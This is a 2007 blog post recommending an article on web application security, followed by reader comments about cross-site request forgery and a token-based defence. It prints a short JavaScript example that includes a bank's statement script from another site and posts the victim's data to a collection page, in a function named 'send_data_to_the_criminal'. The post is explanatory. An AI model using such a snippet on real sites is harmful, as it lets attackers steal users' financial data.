Friday, February 2nd, 2007

Making your web applications more secure:

Category: Security

Nadav Samet has written a simple article explaining various security attacks called Prepare for Attack!—Making Your Web Applications More Secure.

It explains in simple terms, with simple code examples:

  • SQL Injection Attacks
  • XSRF: Cross-Site Request Forgery
  • XSS: Cross-Site Scripting

XSRF: Stealing Information with Scriptaculous

  1. <script src="http://www.tgbank.com/monthly_statement.js" type="text/javascript"></script>
  2. <script type="text/javascript">
  3.     function send_data_to_the_criminal() {
  4.         /* code that converts the statement
  5.             object to string goes here */
  6.         Ajax.Request(’/collect_other_people_data.php’,
  7.                 postBody=’data=’+statement;
  8.     }
  9. window.onload = send_data_to_the_criminal;
  10. </script>

Posted by Dion Almaer at 2:05 am
8 Comments

+++--
3.8 rating from 26 votes

8 Comments »

Comments feed TrackBack URI

So I do not understand how others are programming their projects using Ajax, but I think that there is a simple way to code secure Ajax apps. Well, just take Ajax-Request like common page requests (for instance browse from one page to antoher within the website). There are always some security methos involved when the request starts. Just like checking GET/POST Data, Session Variables and so on.

Now when using these methods within the Ajax-Request, there should not be any trouble with the security of the website compared to to the normal old fashined way!!!

In the example above, the scripts inside monthly_statements.js should just make sure that DATA is only sent to clients who have a valid and running session. If the client (in this case the criminal) would not be authenticated and so there should be no data for him!!!

Comment by Georges — February 2, 2007

George, the client is not the criminal but the victim. He may browse the criminal’s website while he is logged in to the bank in another browser window.

Comment by Nadav Samet — February 2, 2007

Exactly! And – going by the first comment to this post – that’s why we need reminders on good practice.

Comment by ajaxianfading — February 2, 2007

Ajax.Request if a component of Prototype, not Scriptaculous.

Comment by kourge — February 2, 2007

@Nadav: Ok, so I missunderstood that sort of attack! But how to stop/detect such attacks?

Comment by Georges — February 2, 2007

Georges, one way to handle this is that the application will serve the request only if it gets a certain query argument. That value of this argument should be something that only your site can produce and validate, but it will be harder for another site to produce. For instance, it can be a SHA1 of the username and some secret word of your choice.

So you can easily validate this on every sensitive request, but remote sites can’t produce this value easily.

Comment by Nadav Samet — February 2, 2007

Tanks for that enlightmeng Nadav ;)

I also read your article on your site. I certainly will implement this level of security in my next project.

Comment by Georges — February 2, 2007

Good article. I understand SQL Injection and I m currently develop my own application to test it using C#.
I do not understand the remaining subjects.
Regards,
AboKhaled

Comment by AbuKhaled — February 19, 2007

Leave a comment

You must be logged in to post a comment.